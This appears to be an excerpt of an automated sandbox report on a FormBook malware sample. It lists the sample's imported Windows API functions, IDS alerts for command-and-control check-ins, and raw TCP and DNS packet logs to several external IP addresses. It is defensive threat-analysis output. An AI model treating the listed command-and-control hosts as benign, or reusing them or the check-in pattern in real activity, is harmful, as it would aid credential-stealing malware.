GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain | 
English | United States | 
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-22T17:35:18.761396+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49709 | 148.72.152.174 | 80 | TCP
2024-09-22T17:35:18.761396+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49709 | 148.72.152.174 | 80 | TCP
2024-09-22T17:35:34.564690+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49711 | 3.33.130.190 | 80 | TCP
2024-09-22T17:35:37.085303+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49712 | 3.33.130.190 | 80 | TCP
2024-09-22T17:35:39.575322+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49713 | 3.33.130.190 | 80 | TCP
2024-09-22T17:35:42.174257+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49714 | 3.33.130.190 | 80 | TCP
2024-09-22T17:35:42.174257+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49714 | 3.33.130.190 | 80 | TCP
2024-09-22T17:35:48.517116+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49715 | 172.191.244.62 | 80 | TCP
2024-09-22T17:35:50.996842+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49716 | 172.191.244.62 | 80 | TCP
2024-09-22T17:35:53.575926+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49717 | 172.191.244.62 | 80 | TCP
2024-09-22T17:35:56.120065+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49718 | 172.191.244.62 | 80 | TCP
2024-09-22T17:35:56.120065+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49718 | 172.191.244.62 | 80 | TCP
2024-09-22T17:36:02.435973+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49719 | 172.96.191.39 | 80 | TCP
2024-09-22T17:36:04.991771+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49720 | 172.96.191.39 | 80 | TCP
2024-09-22T17:36:07.507518+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49721 | 172.96.191.39 | 80 | TCP
2024-09-22T17:36:10.054859+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49722 | 172.96.191.39 | 80 | TCP
2024-09-22T17:36:10.054859+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49722 | 172.96.191.39 | 80 | TCP
2024-09-22T17:36:15.772021+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49723 | 217.70.184.50 | 80 | TCP
2024-09-22T17:36:18.306948+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49724 | 217.70.184.50 | 80 | TCP
2024-09-22T17:36:20.860552+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49725 | 217.70.184.50 | 80 | TCP
2024-09-22T17:36:23.407666+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49726 | 217.70.184.50 | 80 | TCP
2024-09-22T17:36:23.407666+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49726 | 217.70.184.50 | 80 | TCP
2024-09-22T17:36:29.259482+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49727 | 63.250.47.40 | 80 | TCP
2024-09-22T17:36:31.833562+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49728 | 63.250.47.40 | 80 | TCP
2024-09-22T17:36:34.393042+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49729 | 63.250.47.40 | 80 | TCP
2024-09-22T17:36:37.347253+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49730 | 63.250.47.40 | 80 | TCP
2024-09-22T17:36:37.347253+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49730 | 63.250.47.40 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 22, 2024 17:35:18.191565037 CEST | 49709 | 80 | 192.168.2.7 | 148.72.152.174
Sep 22, 2024 17:35:18.203094959 CEST | 80 | 49709 | 148.72.152.174 | 192.168.2.7
Sep 22, 2024 17:35:18.203324080 CEST | 49709 | 80 | 192.168.2.7 | 148.72.152.174
Sep 22, 2024 17:35:18.210988045 CEST | 49709 | 80 | 192.168.2.7 | 148.72.152.174
Sep 22, 2024 17:35:18.220236063 CEST | 80 | 49709 | 148.72.152.174 | 192.168.2.7
Sep 22, 2024 17:35:18.760966063 CEST | 80 | 49709 | 148.72.152.174 | 192.168.2.7
Sep 22, 2024 17:35:18.761321068 CEST | 80 | 49709 | 148.72.152.174 | 192.168.2.7
Sep 22, 2024 17:35:18.761395931 CEST | 49709 | 80 | 192.168.2.7 | 148.72.152.174
Sep 22, 2024 17:35:18.764204979 CEST | 49709 | 80 | 192.168.2.7 | 148.72.152.174
Sep 22, 2024 17:35:18.776746035 CEST | 80 | 49709 | 148.72.152.174 | 192.168.2.7
Sep 22, 2024 17:35:33.933415890 CEST | 49711 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:33.959399939 CEST | 80 | 49711 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:33.959505081 CEST | 49711 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:33.969995022 CEST | 49711 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:33.980489969 CEST | 80 | 49711 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:34.564611912 CEST | 80 | 49711 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:34.564690113 CEST | 49711 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:35.486634970 CEST | 49711 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:35.491465092 CEST | 80 | 49711 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:36.505280018 CEST | 49712 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:36.540115118 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:36.540219069 CEST | 49712 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:36.550641060 CEST | 49712 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:36.592384100 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:37.085072041 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:37.085303068 CEST | 49712 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:38.064832926 CEST | 49712 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:38.071794033 CEST | 80 | 49712 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:39.084495068 CEST | 49713 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:39.089982986 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:39.090101004 CEST | 49713 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:39.100012064 CEST | 49713 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:39.105034113 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:39.105130911 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:39.575215101 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:39.575321913 CEST | 49713 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:40.612255096 CEST | 49713 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:40.624033928 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:41.637425900 CEST | 49714 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:41.658334970 CEST | 80 | 49714 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:41.658513069 CEST | 49714 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:41.671920061 CEST | 49714 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:41.680931091 CEST | 80 | 49714 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:42.173580885 CEST | 80 | 49714 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:42.174184084 CEST | 80 | 49714 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:42.174257040 CEST | 49714 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:42.176409960 CEST | 49714 | 80 | 192.168.2.7 | 3.33.130.190
Sep 22, 2024 17:35:42.183032036 CEST | 80 | 49714 | 3.33.130.190 | 192.168.2.7
Sep 22, 2024 17:35:47.962259054 CEST | 49715 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:47.976387024 CEST | 80 | 49715 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:47.976526976 CEST | 49715 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:47.991040945 CEST | 49715 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:48.006547928 CEST | 80 | 49715 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:48.515252113 CEST | 80 | 49715 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:48.516979933 CEST | 80 | 49715 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:48.517116070 CEST | 49715 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:49.502362967 CEST | 49715 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:50.528055906 CEST | 49716 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:50.533968925 CEST | 80 | 49716 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:50.534065962 CEST | 49716 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:50.544984102 CEST | 49716 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:50.554039001 CEST | 80 | 49716 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:50.996587992 CEST | 80 | 49716 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:50.996772051 CEST | 80 | 49716 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:50.996841908 CEST | 49716 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:52.049200058 CEST | 49716 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:53.069988012 CEST | 49717 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:53.074966908 CEST | 80 | 49717 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:53.075179100 CEST | 49717 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:53.095289946 CEST | 49717 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:53.100353956 CEST | 80 | 49717 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:53.100692034 CEST | 80 | 49717 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:53.574250937 CEST | 80 | 49717 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:53.575823069 CEST | 80 | 49717 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:53.575926065 CEST | 49717 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:54.611643076 CEST | 49717 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:55.630073071 CEST | 49718 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:55.635283947 CEST | 80 | 49718 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:55.635375977 CEST | 49718 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:55.642049074 CEST | 49718 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:55.648128986 CEST | 80 | 49718 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:56.119117975 CEST | 80 | 49718 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:56.120002985 CEST | 80 | 49718 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:35:56.120064974 CEST | 49718 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:56.121926069 CEST | 49718 | 80 | 192.168.2.7 | 172.191.244.62
Sep 22, 2024 17:35:56.129473925 CEST | 80 | 49718 | 172.191.244.62 | 192.168.2.7
Sep 22, 2024 17:36:01.510426044 CEST | 49719 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:01.515836954 CEST | 80 | 49719 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:01.515954971 CEST | 49719 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:01.526561975 CEST | 49719 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:01.531619072 CEST | 80 | 49719 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:02.435503006 CEST | 80 | 49719 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:02.435914993 CEST | 80 | 49719 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:02.435972929 CEST | 49719 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:03.033567905 CEST | 49719 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:04.053086996 CEST | 49720 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:04.057964087 CEST | 80 | 49720 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:04.058044910 CEST | 49720 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:04.071688890 CEST | 49720 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:04.076551914 CEST | 80 | 49720 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:04.981163025 CEST | 80 | 49720 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:04.989682913 CEST | 80 | 49720 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:04.991770983 CEST | 49720 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:05.580457926 CEST | 49720 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:06.599453926 CEST | 49721 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:06.604367018 CEST | 80 | 49721 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:06.604439974 CEST | 49721 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:06.617681980 CEST | 49721 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:06.622545004 CEST | 80 | 49721 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:06.622685909 CEST | 80 | 49721 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:07.506680965 CEST | 80 | 49721 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:07.506787062 CEST | 80 | 49721 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:07.507518053 CEST | 49721 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:08.127367973 CEST | 49721 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:09.145860910 CEST | 49722 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:09.151113987 CEST | 80 | 49722 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:09.153465033 CEST | 49722 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:09.160659075 CEST | 49722 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:09.165884972 CEST | 80 | 49722 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:10.054687023 CEST | 80 | 49722 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:10.054722071 CEST | 80 | 49722 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:10.054858923 CEST | 49722 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:10.057935953 CEST | 49722 | 80 | 192.168.2.7 | 172.96.191.39
Sep 22, 2024 17:36:10.063117981 CEST | 80 | 49722 | 172.96.191.39 | 192.168.2.7
Sep 22, 2024 17:36:15.135401011 CEST | 49723 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:15.141243935 CEST | 80 | 49723 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:15.141737938 CEST | 49723 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:15.159785032 CEST | 49723 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:15.165047884 CEST | 80 | 49723 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:15.771171093 CEST | 80 | 49723 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:15.771301031 CEST | 80 | 49723 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:15.772021055 CEST | 49723 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:16.674195051 CEST | 49723 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:17.692848921 CEST | 49724 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:17.697742939 CEST | 80 | 49724 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:17.697844982 CEST | 49724 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:17.711430073 CEST | 49724 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:17.716198921 CEST | 80 | 49724 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:18.306798935 CEST | 80 | 49724 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:18.306896925 CEST | 80 | 49724 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:18.306947947 CEST | 49724 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:19.221369028 CEST | 49724 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:20.240097046 CEST | 49725 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:20.245111942 CEST | 80 | 49725 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:20.245196104 CEST | 49725 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:20.256956100 CEST | 49725 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:20.261780977 CEST | 80 | 49725 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:20.261945963 CEST | 80 | 49725 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:20.860364914 CEST | 80 | 49725 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:20.860500097 CEST | 80 | 49725 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:20.860552073 CEST | 49725 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:21.769372940 CEST | 49725 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:22.787373066 CEST | 49726 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:22.792463064 CEST | 80 | 49726 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:22.792537928 CEST | 49726 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:22.800704956 CEST | 49726 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:22.805516005 CEST | 80 | 49726 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:23.407097101 CEST | 80 | 49726 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:23.407460928 CEST | 80 | 49726 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:23.407473087 CEST | 80 | 49726 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:23.407665968 CEST | 49726 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:23.410317898 CEST | 49726 | 80 | 192.168.2.7 | 217.70.184.50
Sep 22, 2024 17:36:23.415085077 CEST | 80 | 49726 | 217.70.184.50 | 192.168.2.7
Sep 22, 2024 17:36:28.644109011 CEST | 49727 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:28.649291039 CEST | 80 | 49727 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:28.649369001 CEST | 49727 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:28.662138939 CEST | 49727 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:28.667310953 CEST | 80 | 49727 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:29.258941889 CEST | 80 | 49727 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:29.259074926 CEST | 80 | 49727 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:29.259481907 CEST | 49727 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:30.174237967 CEST | 49727 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:31.194581985 CEST | 49728 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:31.203371048 CEST | 80 | 49728 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:31.203708887 CEST | 49728 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:31.215193033 CEST | 49728 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:31.222975016 CEST | 80 | 49728 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:31.828917980 CEST | 80 | 49728 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:31.829039097 CEST | 80 | 49728 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:31.833561897 CEST | 49728 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:32.723525047 CEST | 49728 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:33.740295887 CEST | 49729 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:33.803771973 CEST | 80 | 49729 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:33.803901911 CEST | 49729 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:33.815227985 CEST | 49729 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:33.820138931 CEST | 80 | 49729 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:33.820154905 CEST | 80 | 49729 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:34.392795086 CEST | 80 | 49729 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:34.392985106 CEST | 80 | 49729 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:34.393042088 CEST | 49729 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:35.729990005 CEST | 49729 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:36.740554094 CEST | 49730 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:36.746342897 CEST | 80 | 49730 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:36.746438026 CEST | 49730 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:36.754654884 CEST | 49730 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:36.759638071 CEST | 80 | 49730 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:37.347039938 CEST | 80 | 49730 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:37.347064972 CEST | 80 | 49730 | 63.250.47.40 | 192.168.2.7
Sep 22, 2024 17:36:37.347253084 CEST | 49730 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:37.350400925 CEST | 49730 | 80 | 192.168.2.7 | 63.250.47.40
Sep 22, 2024 17:36:37.357048988 CEST | 80 | 49730 | 63.250.47.40 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 22, 2024 17:35:06.965960026 CEST | 65388 | 53 | 192.168.2.7 | 1.1.1.1
Sep 22, 2024 17:35:07.514064074 CEST | 53 | 65388 | 1.1.1.1 | 192.168.2.7
Sep 22, 2024 17:35:12.521604061 CEST | 53541 | 53 | 192.168.2.7 | 1.1.1.1
